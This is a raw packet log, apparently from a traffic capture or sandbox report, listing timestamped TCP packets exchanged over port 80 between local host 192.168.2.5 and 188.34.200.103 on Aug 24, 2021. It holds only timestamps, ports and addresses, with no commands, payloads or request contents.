Aug 24, 2021 08:49:23.989345074 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989347935 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989367962 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989372015 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989394903 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989406109 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989417076 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989437103 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989439964 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989464045 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989473104 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989487886 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989506960 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989511967 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989537001 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989545107 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989559889 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989583969 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989589930 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989607096 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989619970 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989629984 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989651918 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989660978 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989674091 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989696026 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989706993 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989722013 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989731073 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989746094 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989768028 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989770889 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989792109 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989814043 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989815950 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989839077 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989844084 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989862919 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989883900 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989886999 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989912987 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989923954 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989937067 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989953041 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989959955 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989980936 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989983082 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990005970 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990009069 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990027905 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990036011 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990051031 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990072966 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990073919 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990099907 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990104914 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990123987 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990144968 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990147114 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990170002 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990179062 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990204096 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990226030 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990226030 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990248919 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990257025 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990272999 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990295887 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990298033 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990319967 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990343094 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990348101 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990370989 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990371943 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990395069 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990402937 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990417004 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990428925 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990441084 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990453005 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990466118 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990489006 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990510941 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990513086 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990534067 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990534067 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990561008 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990585089 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990585089 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990607023 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990628958 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990632057 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990654945 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990658998 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990677118 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990685940 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990700960 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990725040 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990725040 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990751982 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990767002 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990777016 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990801096 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990802050 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990823984 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990833998 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990848064 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990861893 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990871906 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990896940 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990906954 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990921021 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990945101 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990948915 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990973949 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.990983963 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.990997076 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.991019964 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.991075993 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.997261047 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997348070 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997384071 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997407913 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997430086 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997454882 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997477055 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.997479916 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997500896 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997522116 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997540951 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997550011 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.997564077 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997570992 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.997586012 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997606993 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.997606993 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997631073 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.997632027 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997654915 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997672081 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.997678041 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997700930 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997704029 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.997723103 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.997749090 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.997781038 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.011364937 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011414051 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011437893 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011462927 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011487961 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011511087 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011529922 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.011533976 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011555910 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011579037 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011603117 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011622906 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.011626005 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011651039 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011673927 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011696100 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011718988 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011742115 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011764050 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011785030 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011809111 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011836052 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011859894 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011859894 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.011882067 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011907101 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011929989 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011953115 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011970997 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.011976004 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.011979103 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.011996984 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012000084 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012026072 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012049913 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012051105 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012073040 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012095928 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012099028 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012120008 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012124062 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012145042 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012152910 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012168884 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012172937 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012193918 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012218952 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012222052 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012224913 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012244940 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012247086 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012270927 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012295008 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012295961 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012317896 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012339115 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012341976 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012362957 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012383938 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012386084 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012408972 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012428045 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012430906 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012451887 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012451887 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012475014 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012492895 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012497902 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012523890 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012532949 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012547970 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012557030 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012571096 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012592077 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012593031 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012615919 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012619019 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012639046 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012640953 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012661934 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012666941 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012682915 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012692928 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012706995 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012727976 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012736082 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012748003 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012767076 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012768030 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012792110 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012809038 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012814045 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012835979 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012836933 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012859106 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012866020 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012883902 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012888908 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012907028 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012917042 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012929916 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012948036 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012950897 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012974024 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.012979984 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.012994051 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013009071 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013017893 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013040066 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013044119 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013067007 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013084888 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013091087 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013113022 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013128042 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013135910 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013151884 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013159037 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013181925 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013187885 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013202906 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013214111 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013225079 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013252020 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013252974 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013277054 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013290882 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013298988 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013323069 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013329983 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013345957 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013355017 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013367891 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013390064 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013390064 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013412952 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013420105 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013437986 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013438940 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013459921 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013475895 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013484001 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013497114 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013506889 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013530016 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013531923 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013556004 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.013564110 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.013602972 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.021214962 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.021253109 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.021270037 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.021292925 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.021308899 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.021326065 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.021341085 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.021353960 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.021365881 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.021378040 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.021397114 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.021413088 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.021429062 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.021509886 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.021541119 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.021547079 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.034293890 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034332037 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034351110 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034373999 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034394979 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034415960 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034436941 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034459114 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034485102 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034507990 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034528017 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034550905 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034571886 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034594059 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034624100 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034647942 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034668922 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034806013 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034837008 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034861088 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034883976 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034904003 CEST	80	49718	188.34.200.103	192.168.2.5
